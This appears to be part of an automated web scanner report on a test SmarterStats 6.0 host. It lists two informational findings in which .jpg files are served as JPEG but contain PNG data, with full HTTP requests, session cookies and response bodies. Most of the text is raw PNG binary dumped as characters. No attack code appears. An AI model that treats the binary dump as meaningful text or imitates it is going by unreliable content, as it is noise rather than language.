.={.!..$l..(.8.V.......h.m.;......a....h.m....oI......oA....l...4.-.t.5).fS..f%l.{.:.....A.6_I..f.5oQ..n..=..$lk.(.8.V..~.o.c....wW.......-.o.
...}C.%E.~v.r......i..g..g...... l}qT..U./.,i..s.6_.
....*.."l..~.x.V.V.........;..........o.
.i'M.%E.~.r.x...5$g.m#h..4Z...Q.+a{n.a.....^.6_I...&v.o.
.];.,..&l....+Za;...'....W|.n...a..'...h.....".."l?9s....m..8}]#l.....lnn......k    ...j......j`......K5.%...u.$Z...xe...5.Uj.a_*....?.Yi`_.......l.
...t..VC........A9.`_.."k.}.j...y,S...Tb.-.{..K...z.W..    ..... ....&.tg.F.a    .@...... .....b.... ...@...X...Fu@...... .....6..D. ...@......F..@....o....k.\m...IG....yS.;...{....v..=.U...1....|<...ldo.. ....UU.l.0.!Q.~...+X
o.......0#l.U..Z.......w..iV.{.i..b.._...c> l.......z..[...^&.x.D.2!&6.f...|[..X|>.avm....T1.m.........Z.....|.......#l.3g.9....9+......3..v..f..    D.....f.u..h..23...~.../l...C.[.e..2    .M.g...:.......:X....(....K.....x.k..5.
{9..B...T.m..},...f2.C.....;...d,.^
Z.3..........Q....K..[u....&...M....a+..h.9u..[Q...1.V.\n.aa......xk......?...'...6....._.2A...>....lV.p...U..#la.|.G.=.VU...@...... P...V... ...@....@U....H...@...... P...V... ...@....@U....H...@...... P...V... ...@....@U....H...@...... P...V... ...@....@U....H...@...... P...V... ...@....@U....H...@...... P...V... ...@....@U....H...@...... P...V... ...@....@U...}.ut........IEND.B`.

10.23. http://vulnerable.smarterstats.6.0.host:9999/Temp/590bf795fdaf4e02b7d0880f79b70e34.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Temp/590bf795fdaf4e02b7d0880f79b70e34.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /Temp/590bf795fdaf4e02b7d0880f79b70e34.jpg HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewOverviewReport.aspx?reportID=OVERVIEW_Workspace
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; SelectedLanguage=; STTTState=

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 03:32:12 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: public
ETag: W/"1CB682BB9C88600"
Content-Type: image/jpeg
Content-Length: 8473
Connection: Close

.PNG
.
...IHDR...".........L.......sRGB.........gAMA......a....    pHYs..........o.d.. .IDATx^.].......5.F..A1>0Qs#*o.<D...!...E8.S." ..7.../....|.C .9..8..BV....fy...w....P.w..L.L.......s.^..2gO............\@.......N..........B. ..@ u. D.w....@.B....@ u. D.w....@.B....@ u. D.w....@.B....@ u. D.w....@ .B.%
.&..T,.BW`.t.r.6...............|[.....5.D......hE.U.Q.<{..# ....R."/xD....+o...[.s.8....D [BD.N...<U.T%D.-/..j!...[kkk.8r..,G....~.-
0@.h......,......Y.....$F.^$.6^..MX.w...!.#B...d.f."...U#...P2.*...Q.........;...yH.B..    .z.f...$.;.%5....-_yt_|..>5#.q......G......!R.... ......*...Q=(.
..#{u.U..!RAK.mV    .i.|...f.a!r...J.....l!R.../..C......a!..s./A.b.....J.N..;.%5......H-htX..:PT.#..C. D.....Y%..i.......B..1..AfM@*V.U.!D.".P.c.UBpZ..9(..@. Dj....d...b5Y..B.!R.e=.Y%..u.......B..1..AfM@*V.U.!D.".P.c.UBpZ..9(..@. Dj....d...b5Y..B.!R.e=.Y%..u.......B..1..AfM@*V.U.!D.".P.c.UBpZ..9(..@. Dj....d...b5Y..B.!R.e=.Y%..u.......B..1..AfM@*V.U.!D.".P.c.UBpZ..9(..@. Dj....d...b5Y..B.!R.e=.Y%..u.......B..1..AfM@*V.U.!D.".P.c.UBpZ..9(..@. Dj....d...b5Y..B.!R.e=.Y%..u.......B..1..AfM@*V.U.!D.".P.c.UBpZ..9(    ...C,.7.e.!....E.....Q^}&q...F.`.wY.A. D.@.md......I.W..%.^p..~.....(..L....#D.v?!.....?..B.
..F."....3........w.....u.B./.B.n.7...J....
....BW..a..U....XY42.X:.o....|.E..7......2n\...>.p...
........    ..TNxt.XmWA......}......K:.@f.h..2.;MTO.}?...B.
P...(...hAr3!..0!r..+.J...PNTgA.o...>.C.B....F&    ..qdD,8....[>1{.. .}L!
...;....[~.:B$3....$J..#H......B..    #F."#0......._.B...&VCc
..nE.:B$.....|QP.."D....2!.P........8v....%..c.@|!.f)4....q. ....fUm    .|.L.C3V..jd..9.F..hTOv..B...3...EL!*....\y..."`N..G.B$...'....s@.Ii.~iB;....0G....F .V8.......w.....e..S..D.........f.w...=.............)B$.n......cK.s...3.$.....B!t]..uL#dDL.4.....T......,......^..!X!ly....S...$.&....mY.|.F....Zs..|ff.qc....w.s...LX.|.n.!..id. s$D.......=.....(..R..Bd.zS.H.e.=..9;F.I;..MgfD....Xu[c.!2.U .y.M.+i...=.$-D.-..C2w.....P.....m..I..)../.-.|..#D.Y.........zg.5cF...w.)B$.2...*.!j..p......W.(C.n8.v9}....>...cn*.s..-.....=..f.A,.>...D..Jh[.6E..b.......U....'....jJ......C.X.d.....N0A..Z...#....R.6..,vt.fuCl!......b......<. .y.Mes.>.-...../...S.......#[    m.....T.....g.r.........."V...!#2.U&..T..{}di......$D{:_fuCL!r6.2.c...Y.&b.!J.......17...>... v].-.\..jhL!r..vf5..D. D...X9..<.....w<...#D...K.....".z-o.`.....(1hC+..........&...;.!.y.......6.6.......y.M    ..g..~........Y..90A.X....B..Nve&p.5D..P. !..b.o."..+Pt.. .n....{8.....3.....!Z........(..@f....K.ww...OG...f.w.....g Dl.t.&M...V.....u.w,?6....<5...$.P..VR....    ...'i..w.V.3{..........F..y.%..r...d....n.4!.l.|.G..g......Mw..UVW48G...e,...A...-o.2......>.m..9B4...WXmP..'5.v.Z52."V.h5..i..]Y...>.a../.vN.e..D..2!.N...    .&.XI.n..&...07.;.3....#B.....%    ........Bd.s.BD.3{|....M.e.e#{......;...'...<.&.h.....]w.-..Q.y.B....
.+....
!R.../@...0V.I.N....{.#BSd....,?....+.    C.B....FI.B..U...pt...F<...bs.dY.]N.<.${.p.."..;....c........\........14....D.........t.$......O..M..d.{9..b+p.......7|0....D.....-......u42......$    .tk.{0...zJfDK~.$6}..,{.4...    .......V..u.D..a.`.D.f.U?...B....F .V8..%.....R.V..#.rD...3BT|.P`F.~j.fB..U.z.......f.k..I."i..{0..>.._.uDh.,{....;.......8S..Q=|!...;...^.......Vy2.[(.P..b ~...h.........b......02+D^.04ct.f.d...eV.$..?Y-.-.....ry.O..`./D..U....b.v,3[........}fM._..........Q.1~....f....MJ{.@R.....D#./..I..]g../.7A.Y............_.T.....u..f...."IB....>...0.3{j....=U../..#*eD.&.....Pp.... D.c.2..8..I.(.3....4...T....5>..<.+..!......QA......W.{0\..l..?...._.-.........>..|.9"....!#J.......1.;&...>......q..r..VC...w>..9....c!D.X.j..!.:.R.|....g6...b..q..r...%;Gd"...."SHW..2..<...}...cC..z.\Z..f5TKF$W:{..FF..^.......$..% "*I
w.}f+[G8"4.\Z..b5K..U..8T......4J*..t+....!
..._.-.w.9..X...[v.."....V.dD.<.f`+.m..B.......E.s..    _.u.yV.7......;.Y>.7.9":K......_.[.;.Q+..zW......sC[    m......\W.+.,.6-!.P%.6$D...\{....n1..~....G...k....]...V.!D........I..........213..wT..G..........%....s.........VB..7.(8....!.n...;    .Q..}G..Go...:.T..PQf....9.pg[    m............5...lF.:.}^....1.........Q.."[    m....`!.y.i..S....f.~.c....u....3Q.bF.-DnVt......R.....o.Qmt.......i    .9...X....%!Z.1:...>.9..j.d-+.....o.Qm...;..y..C./.`Q....u.....h..L.w..].Yy.o+.m..BTKg.5B..{..C./Lg..B..DB..."NY..`9iM+I.p.Jh[....F...c...5..fL....U.....c....[.,.&3.3[    m....Z!r.w.:.h..uNc.^7.....%t@#..:.(#z...v..v_9<...3[    m....Z...w\.......(.A...|..Q...G.k.(%M......!..xz{.....)D.k.....V%    ..s.*.....H......!..xz.<j].@.l...........{&.m...
...?..c..l%..~C.j#~.......!CB.6...2...5)..../.gt2]......o.Qm....I.......),z4.....y...W*+....-.Rl:. ...Jh[.....;. ?.....1&D......^U.....7..A..l%..~C......c....)D..?.z..s|)N.=...h..a.e./...._.v15-.....!..:.>q...~......Y.hph..}...,?R5.+DKZ...........V.!D.Pw..1....."..........k{....hh........;..VB..7....t..eD..x$.?.;'...`F...+:...6..OB....Xe..;dG..    .VB..7...+...e_
....g.    ..6.6jD...=(....wSi.....o..?....a?..".Y !Z~vp.2xy/A...q.Jh[......v..]ym(w.....E....]f....._...m%...v..y..x..a..."........].U.il......!.3..w.\wC(w..&Q!*........(i}..wR...oR<l.<...jH.....].|t.....<.R.F...V.!D.....On.%.;.ox#...Q...$.>.    ;T?..........,....y...B40vYzz.<...wyG..E!.{...V.!D.(..IL.{[(w..<.
w;.....n.U-8rx..ia......!j...uk*g..Jh[....Y$.w|pg(w6v+!..O...{.H#B...*..u.kg..FJ.........H....{.|}.].................p?.?a]nQH..
S....3..F.....z.......V...U..]U....B.....Xt.94c.....w...5.d.g.[..!.QV......~.#......Nn.....!...]U......!.....{6..z|........._>$.......6c..m%..~C.*Bt..6..[.7....JH...X-i..2.%...(s>.....f.q.....o.Q.h..,.....z.Y.!.+SQ...VH...H......mLl/.....o.Q.W.\.i.uuy...D'..$....h.W........6. ..
u...W.e+.m..BT.^z03:c]..?.$+.14s`JJ.\q......[....G.
.s.f+.m..BT........B..Z.QQ..L.....b..k....k..l%..~C.*..,.;......c.....Q)#Z....2...23........l%..~C...I.o...8xg]....EQ..w...}.3ce....N..u..d......o.Q1..........S.7..?..qdD..h.W.&L........
..0..I..l%..~C.....f|..O.......b.BT...:..+O..I.&Y[    m............8...1."..%!Z....2.....1k+.m..BTd.e.CV....Z..W......~.x...jA'.5r.Jh[........C........dDl~...~.e.......-3.e+.m..BT....{..;{Grfm.c....Qih..#D...O...3...{.Jh[...    ..)....'.3k D|jSF....R)..^%.M.q/[    m..................FFT..^9...Fy|.r.G..VB..7.H.....N.......X.!*....P..........8.....o.....-pN.......#Ya!*    Q.#Bi.y......l.8.....o...gm..p../o@....9.....V.Si's..VB..wO."z.(=.......7:xg.##*gD.    ......._.vQY.l%..~.t!r...~.6..2[#.@.../..V...N)D.l^.........h.'..C.^!.~q7./..=.
idD..h...8..W.....UD...V.{.....Mo^....sM."..%!...P.e...dVD...\...V.M...-L.!...q5..;?D...
.H..hh6...S-.....    ...R.H...~..":.........W....5....NG........
.H... D$...}O,.7A.s!_mm.e..I..e.....O.....H...v.....4r5.;.....*..QLC..z..../.J.<.r...E....D.Mm.;I!.a.-. .y....Kmw.b....v.....#..$.......+...s.Y.b..4G..)..S.................l.;)!.c.....\)f~.'4.i.....Y.....;~+c.bT.'.....".QI..:".vy..G...W*.!k+.m...2.1.N_ q...j1.X..q8......+gus.    ....|......."..K#...=..L.Q..VY.,>:.X...N!"!..nR...f/...D(:.......Z..z....5....of..m...CY."#*    .K...Y(...V...    ,Vd$ld......V.W........{..^'.(.7...../..r.}..\qv.+. D...9B...;.W.....s.    ,N.I.....!...$".,.RL=tK......R..n..4DS..}[.._..sE;...%.....73e.......Y..b.....~7"D..tF9eA...........<DS..........Wl?...fER....
9...$K..U...    ..O(....m....X...4....BD....<...x..........Z.!.
........Ol{..u.D.)/.$..D!......(.v{........]...C%...L..l.;........*1.w?..g.....-..=D..N...c......wY...X .n..Q6.....].LQ.n.T...-..h..G..h....o>..O..{.....-D..m.P..8$.(......b..    b.G...^}.#......G..W.?Glp.......?.^......-.Y"fm.&&m......;...h....V4_B...e. ...z.....].......N.I$...*..h...H.b...Q.=.i.h~{..<l_...x[.7f.u...} ...@[^4...Q..E!"a.p...#

zrAD.Eo..#m...].u:>7..+.:(#...j1t....3.o.V#W8C.......77L.......Q.}..^r...(^h.......1E...AM.J.........w..h.q..y.b.B...*..Qiii..6mB.....1.._......gh.B+.F$.6^..MX.w...-...o..M...OV.;vL?..j..w[..n.....{
.=+Sx|..V.....
..V.T@.-....".!J......................p....n&D.....A.K...7..s..tM>}...F.........Ym.........].aA6...=pob)..X*...k)..7...f...f.w...H.(.=.A..'g.Z........\>/......g.Z.Wp.V....Y.B../..E&.%ojq./..hS..A?,.>..W..?...e<N<......[...U.=..&B..".)....w...W7..~.K.Xp...O.=..,8.....Xw......|J..`..{....7NB....Y
....8.'D.?.Y...    ...:B......o%U......j.JT.J...Qu
.&JY.....~.jV.....X;.!N...nF....8.....&$....R....n..E..o.u...OT..V..J.B.2..D.H.=U2:.G.)2.o.B..vT..kp..g."e(N..D.#o.ds.y....g~+-.{TF.!B.9..Ib.(....h    dD....I.s2Y......fYlGi..;.....e......_.......v....(R....5.~n.z.#J.i..4DK"#.M....U..%=....9.....YjG...    . 2;.r.q...b`].......*...}.).Q......fasJ._.6...?..."...........K.~.....v...ib..c9[2.'..Y.X..y..........I>>..@ ..@...C...... D=...D .u. DY.!...z.......h"..:.........=...Q..d4..d...Q.{..........t2.......(.=...@.@.B..:.M..YG.B....@.. .!....&...#..,#t.Xy......IEND.B`.

10.24. http://vulnerable.smarterstats.6.0.host:9999/Temp/5bf056fa42644067bd0099f9d59829e2.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Temp/5bf056fa42644067bd0099f9d59829e2.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /Temp/5bf056fa42644067bd0099f9d59829e2.jpg HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewReports.aspx?Custom=False&ReportType=Standard&subReportName=CEO
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 03:59:29 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: public
ETag: W/"1CB682F8851B980"
Content-Type: image/jpeg
Content-Length: 14400
Connection: Close

.PNG
.
...IHDR...l............    ....sRGB.........gAMA......a....    pHYs..........o.d..7.IDATx^..[..Wz.... .z..A..@........yX&...B..lf.9....."..@..h..`y7...+2.R....ZF.5......(R;...e....(-9.....w....s......u9U....4f..........wn..m" ." ." ." .^....................    69...........xN@...
...............|@.D@.D@.D@.<' ..y...D@.D@.D@.D@.M> ." ." ." ....`...t{" ." ." ." .&.............    H.y^A.=..........h.`.7.W.4.c....6.d.l....c....lb^. ." ." .".....R.k.T.,........Gc..d.v.[....    .Y..#..,..ls3f.>..-xo. ....s^..nN.D@.D@..&pr...qf.[..Qs*...f...f.d..I6i..M&..5H....D[T.-
...=...Z8..}...N ." ." ..".(.&..    6d..Y..{.I.I.....$.lU.....I.l&.Y.+]..........    ....d.fB......E......o.k.`C....s..S
...i..[o..~.ms.....@> .........yq....'...Oo4.._....k.`..,.....-O.(.T.x....8.b%N...J.$N.....y...v.....I.c.X5^.@.7{..:@3*?..q^.~.m.4...+..8..G...?q.R..p.....)sx..A.!..c.srE..U{.[...N...yk.......<K..X..8q.8+..xN.W......^7..."......0..G......H......5P...        6.....'X...J...#.Y..Fs:.p.....    ..?....w.O...W8........>.c..    ..N ..A....$.&N<..R.=q..$[..=e...|0.<b...~...&,.L.29..6[u..[...`..)hp.$...'.Y..'N..........>1.zi..............?..l..i....[...l.4.....8..8....s.-.j.3....6/.<l....{Wn.e.l......77$....l..TW|    ....&..?.2...&x}..cff......:..,..."...a..R.6..|j4..7n...o.CGO.+.n..Wo.d.i...{.../.3.;..n~..M..-,..?...#....g}...u.K-...].....o..l..{.Q;.hV...............}O.e......]=wb.....2.n.!m    .ykT..    ^....}<.    .......3......O...zp.O.`...;>..._./dW..5...-\5oN......E.X.{.>..~3u.X ...i.h.....I.e..D........o7..[j ........k.....&N."........8\..8.SE..l..P...>.Ob.v.......`....jF.k...i...+.l...>.}W.........I3.JS......MA&.2....X.D.l).5!p.,r&sq.cC..O~.....IgD_.?..l....l..E.u4.!;...qX..n....8.7D4...[....a...$.........K.e...;/...].3{..i......4..2l...M..G...g.vN......G^.
..D.......}.|...^3.m......6.".b.P.1..AF..84........d....4o.?|&.V......./...&...a...+...M.C(....|...J.......A.$)......./.pm.....;.....0.._.].8'...7..q..........p.o.8..    ..SkX..X..d.S..Y.._<A]c^Q...<.l.j...k3j...p..5<2...........q.O..g.m........!. .`...._07n.r^.h...........s.t?*......M.iFn......{Y..:.<..R.9%.2.@.......nS.P.
.g..v].b&.mz..|...?...Q7.m...,;.i.t...4*.R%'d.q....;...#h.E....z+..D...q.&;    .4..\..S.s....J.e..:8/......@,U.E..s.?4.7=P..x.2......l:.QB.(v..8em....#T]...9.~p.......r..l..e.b.......[.*..y...Q...Z...0......d.t.....e,....    ..qsf....?...:p...7.~R?.+...............w..5.$.,"2`I..Q..P..W+.i3.w.....\u;N.-C.....K.54.....40..bR.......6.W..C..    ....q.dA.d..WGNh..3..I..C.."..H.....a...~.;...30.......f.C...B_A.;M...';....,.j..EJyB_c^.b..\.-C.....C}..Nv....!IA..$.?..>.:..*..)....N.aW'@F-.P.e.B.G.....    .yE\T...5..au.4..U"...q...`...+._Q..1..U.:....m.l^...........]61.........*.'..Y5.R...O.............v+.........    .........E...;.Q~..q...|!...,d. ...h.e.r
g.....[......>.<We..y.&.f..N..%....l...n]...e....X"/...A.-.'j....1...7*h...M.E..@T..&M..E..+'4...U......GD..S^_    .-........3..c......=.Q..    ....7...|.-_U.....*./.m.`..5..p.-../. ......Q.T..B..I....+....Q.=\m.i..u.....KF!....qs..e.g_GNE..=.&....~.....g.e.|.^..vU....+...$.,...Y..3.X.4*....~&n..*.....W}....A.>....)...{...u......E.......]nu.....s..4O.>.\..6.X.].U........G.4.r.mzz:.&...b...?.c..3.....H..vU./..y...ic.....[..-+.._..5/..!......f.....'%....W........R}...    6?.[;.[D..}..Dm..g....k..`.kn6...m.    ..    ....S+b..x:}..9.).K[q..J.q.\[5_.......~4..9..NM.Qge....{....(W._...YVe..........M..&.*.....o>%N\.H.q.\[5^.......}I......z ....u.I..a..~.BC[.4.........S.h..~j.....7NUq.w]q.G........U...kd....M.Y3l8.e.`.....^.........xv..C..a~5...0;W.|V.p.W
.G...X.....J.-.a..[.&.<.."..L[.7....}..i:..MB.-...\.y+.8.w[..8q.].<..d...l.....B...    4.`.J....,....E...&V....}.|...JN\M.a%N\=..y..ee    H.e.....B......]..0lk.-....[.C.....'_.?.....1*...
N>r.wO.4.P...c.wUYE    H.e.."....Y..c1...,...f...j..0.).....0M..&lS6......8q5Qd...(.8..l...(.....|1....?$....Y......b..,N...kIFGb_..~.K.{..8...2.)N...b.w5Y%..`K...:K.\.~#H._.z.,\....AS._..7u..0lc.-+...NR.\s.......=.bY6..I.Y..9.y.U.K.8..l.'.V.l)....o<...`..|.;.....1....0.2...mY.<.R.p.M]r....;..M.B......#m.....^|..'.v$.8N..$.H../]5..}3x.[...v..5..?...P."........D^..fy..m...aUo/Iw..8..Z.4.......t../........+...Z.....J..$|..T..U.......P .l.    ~.c...qv^&.S...s...W..Y..a..lyY..[....    ...~j...KM.y+.S.9..wq.G...........I......[...l.px.G;&G.....g....e....d.|.\.,zf....6e....\I5;..NI.I.....t..."8..f.....5V...r......?y.w.......WO.I..+Q=.$.R....+fsg.%8..^z7.^;... .._.../.n.....3......j..s\&...xoZ..........VMg......k....O...ly85..S.qb(...C..]Oo4..).........On4.W<jNE../.d.v?W..ZI.e.:.6....0..F.=....................~.D\..C.......5y+.U....e..$....s?.Q...S..'ZFq.j.....6e...
6d.....{..d.v?W..ZI.e..q.k....p...h3d..S..jRE... ......6d(..C.z.bD-..5y+.U...li8..j..g..[N...K......\....b^.kzzz.$.    .....2..m..:f@.-.$....+Y..$.2..(.f'..7..(..l...y..0......;CM....X.........5....?.0..?|..1....).81..&..S.I.....Wi..sN.d...`.P_I.-...yD..t..!P.......|..z.>s.....U.C.dU..g..Q....7........f...8..'...V......N&MM..c....m.l^.......Dw:...M..>I.?.\.y.Z.....-@F`...QM..T.b8."..&."...\...w\....K........('4{b..{Wn..jh.lCF-Z.E~......%N.qF.Y..=c7.v.P.......m.WN.I..+Nm..&.f...([.<$..f...{..mf.\........W/..........o..8.R...s..C.:..{v....s1.H..C4.6m..../.#...}.........a....7..p:t.W.+).f..>d......{U...u..#..6.)<.G..Z....ov.hw.A.)A..B.....A..f. ...Y.hV.....:8...:......;.......
......q..E?...0....y....g.-7.q .Y...../....k_=.....F......h..M........n.&.........0'p.....e......Og.r...........l...V......H{d;..$.l...lff.Y.avH...a7.....1a../.....>6.^{.<.?w....+...~U.4......0.~i.y......?4'N.*...j..^6..<g.B..s...........f....9.....J..._..e....x_Pn.z..o.,..4,a.;......!Q....:.{&..._._=.e..~...3p..:....T...G.......^./v..|..@.B.F.....6.q ...,.....Qu......i6..j...Xj    6.nQ.....a.w.o..l..h....j$.<...9..X?..fv..@."d..<}......U.e../.C.{.=F_q...._Y....kA.,z,....rNW..X..<...0.}..F..u}?..W.....{<.~.9.jK.8Nn..wmY.    .N....".D..P....vV.E........!..C3.].u.9F}....w..?.{C+G.9..c.......g.D?=qv......../.I..K....B.....XMd......>AGTmI.$D8..'.......U......4..:...A....8............A..B.f..&..f....l....H...........s.......!L...O.o_8........cr.....k...'...=b....,....Y.".0|..(...{..D...!...}/......h.^...{......X.8N.l.'.V..l.....p]I......2.:....:~........Y....2/~...f:4.F.....,b\...ZW..\.z... .......z../vGjk.M@B...q.8I.q.\[5P..F.e.g.......\1h.BF.*dF..(&sd....t.88..'q..pV.'..... ..7;..t8..?E    G5...[zf.M...o.!g.]t6..V=.hk......8..G...?q.$."......M.....9.8...$..3.`#..~..{../..#q.4s...{.......8..G...`.`.<.C+9/W)..Fx......r......3q.x..8q.8+...',.....<U[.y..p.4n^.l.<~..Z.u.\..;.{.....8..G..R..r...:.D.qMk.&...:.r^.Z.A..W.6...}+.U.......Eq.'..g....    ".7.a..=...c%.......VF..|f..]s'wC.[.......&N.*q.'..g...qrm%.......VV.h...e..j._+q..F...#.Y).q.\[I.e ,.....4N.~..|n)wS.Z.......%N.*q.'..g..g....^...C.......e%.......Vf.x...../f.....LV....%q.P..8q.8+...8.....-...j%.......Vf.....e..j.O+q..E...#.Y)..'.M..c..J.-.=9/......=0......V&.:...,N\...8q.8+.<cNm....<....A.(2l+./IekI.....+9/.............n.3..YyV|.v..C%N...........".#..J.-.?9/.....>l..V..lVud.{.'...I.8...b......[..r^.Z.A.....`..._V....8..G..R..8..j.`;6....|}.Z.a..4...<.Z...."h.I.M.u..`U7F...5&.X.....1/X...O}....t..XO.c.....mn.,[=c...............|......l..P..y9D.U...../Z...U...8qU!N...................Xj..l%..J..2\K..T8......!...f.^8..}?...u.t.RU.....U.JW..[..W..$N.....1.N....#.,i?.5.U..m..Zn.Z...2_i..`.........`33;..K%....*h.q.AU...r.g.'..8..G..j.`.f.0.GxZ.....).b.V...n.d8.6.TY@    ..`_..e.b..........@.._........?Q..O.....@N.h.`..I......%...f.^..#.00..&..!.>lj.-@.S...W......M.P...Q..|(?{.....'q..pV..l..2.*...Q..5.2l........:&U..>...Ns..    .f+...U.EOuyq.p..8q.8+.<p.6..t.(.'.(...$...+.*i@......9...Q...U.b....q.jA...#.YI..G......`.(.YwN....9..R.Vr^.y.Aca.....]..VlU5...O_^.8T.$N...J1/<../....Z....L..z.....C.....{...S.Wh...
.O_Z.8T.$N...J1.?Z..4...Z.a...g+9/W;>..S...C....p.V>........C%N.......:.Nn4..lZ./[.....*.t`3k.M.Kb..q.U......C......Xq.Z..8q..I.8...b....U...u..._..1.%h|..c..O..n."+_XUT|......'q..pV\...E..h..A..`......Q.M..\..i%....8..p....K..|f6......V>3....WC.$N.....y.........~^..D\+.a?t.^sc.&.~.8...T.......a...ekwJ.............O...$.FW...C%N...1o.c~4..~.;....I..+M}.*.l%.%Zp..w..o.&...a.....X..^....8..G..J....[....]....L....l...JS..]...........-.n:.K........)h.>..'V>..8q.#N.........~..=.4c.g.."..}...5..B..]....:]K...TV.l.....g..1x.....GF.'q.jF...#.Y.1/".p..f....6}2..J...?."....LY.+.lYn..ch...f+.............I..o...$.FW...C%N.'*.........|.8.!|.$.....d....1...lY..`.@.r...m.!>>.1.........7F..q.jE...#.Y11......!a.?5...Ni..`.
.J.....jqwU.`...i....>._.....G..'.V.I.8...#..3Z-Ln...P..
..H.S..P.
.[    .r|    W....K?..A...h..i...O..a.kC....'.......69....V...L
.~...[.Gp...n..C|}..8..WV...8q5"N.......8N..*.l.5D{#C].......T_...kX..S}......>.>....q.'..g...qrmU.`.E.7.W..N..a.m9gv..    ..z..[...V...M... ..P..4|.|.3+.....'..8..G..R...Y[\.....m
..@.QMoU.`.....Z..;.n....Y.|..<.=.......?.~{=.......y...~.s..2UX....gV.0.....'....{.qR..8...C..Ji.K..n.1..=Cv-.?.~.x9/...?..,...}.|g..#    6...O.+q.8).q.\[y"....Er.b.&.M.l...h.a.6..y9...ax..O.O_}.+.c+.Y9.>}zq.P..8q.8+.<p..r.k.]\/.....B......)4$.....$...#..FZ..jx .Uo.'??b......'.........| ..$..b.......x.L.[.h.@..;J4I..I4...w.:...e.A.X...2>.'..8..G...`..*..6S.`.[K..6.A
...\..t..].....A..1_<Q.....Sff..E.=....*u... N.Tq.'..g%.....>d.F[.a...P.....)D4.G...NV...........0.....*....8q5 N.....$.:.z..........j~....TVr^.W]...].3...0W(GVua....i..C%N.......8N..$.2...r...4|X......wg%N.[q.'..g.....f...!j...........V..qx..fn..\..X........'..8..G..R..r
F..V:..c+s.`.@[..A.S..z.A.Xq...J.8..$N...J1..4UwZ..6    ..........*........[...T...#.Y)..e...Q.a.V.l.(.y9hu..U.>..+.....'..8..G..R...tj.m.&R.a..."+9/..nA....uc.y@.V..1.'q..pV.y.....H.a..u.J..A.c.8.....}....hUGV...>.8q..I.8...b^....-S.0GV.l...y9hu...f.3......@.:.*......C%N........9.zT.D9...J...E]...O.m.|1... ...*...i..C%N........8i.6.{*...r.P..Q......<.8+q.X..8q.8+.<..k+5.f ,....5h\.4o.<~..y.2W.........:.8q..I.8...b^..bsh..|.i.....l...X.y9hu..e.>.3+.....'..8..G..R......A.).+.._.zp^T....._...>l..V.VgVe1.u...-N.......B...F........\V..e.'....=h.9....8..o%N.Cq.'..g....4.....q..ZI.e (....=h`>64.....U...a.)..8V..qR..8..j.`;6..,.0.c..w,_...M........?.1.`..;V@p....k>......'q..pV.y.'.V..ls3fYG...[.~.....7.Wo3..8.r^.S...'.<l0....    .\3R..',.X...I1.....%.mQ.M..    6d..Y...Q....[6.ax..l.es.5..kF.l<a...J.8N.y.'.V..l=16.,.L.3.}zz..Q.^............w........@+}@.......|.....3..x..lI....s5...........
...).2..>L.8T.$N...J1.......-<...0@?65..v.f...fQ4....`9..$N...J..q.`.8..j.`...n...t0kV-......I.C...6.U.~.>.8qt.I.8..U:.....g._.\jv..-x%-..d.v?W.zZ.W.u.K.z.u.&....6..K..'..8..G.....V..0.    .... ...O.k'.......V..l.U....]...iZ..h.C..w.9....r..sRq....8q.8+............j....$.......J.-C.q....;.iA....Mc.....#+N......fK.~..0...l..O[.....q.6i.s.....[...`..51h.....<...h..j".".D.!N.Uq.'..g...I.qT.[I..g....m<.&.WS|4..x.Io!N.3q.'..g....I....J.-=3    6.YS....o/|}..."].6.'..8..G...#.......q..B6I.2...V++    .....y3\.!.45h.......veq....8q.8.t1o0..+.O.1.....C.z..H......t....9..A....MeU.+..GT...#.Y..y....)..d.! ...\9o.[...&..O^y. .V..dVE1.y...)N.........4 .S..* .....8o.....&.....h2.".T.8..$N...J1....J.-.a9/...A..sK...op0.X5.U!..a.1..8T..qR..8...`.@X..Ak....)>......V.4..,.I.8...b......[..r^.Z....'.2.sG8 #...*7$    .....C%N.'.<..k+    .......6<......8..m%N.Eq.'..g...qrm%..........q..e.w...'.m.+.k$......9...8).q.\[I.e ,.....aXD..-.8.I..'..8..G..R..8..j.`.7.W.7w,...M.........t9.8B....4..H.-.8..`.........8).q.\[5^.A.-.0..87c.-.f6...w.....u..    .r^.R...h..HW.C>.....O.......8N.../.......\4..~?
...s.6....N.}...-..&VY..c...'N.......8N...%..a[=c.u.F..............mA#O..m.8....'..8..G..R..8..j.`..Cm.('.....5....^b......3.~.../..........l...w.v...X..5.r........=..
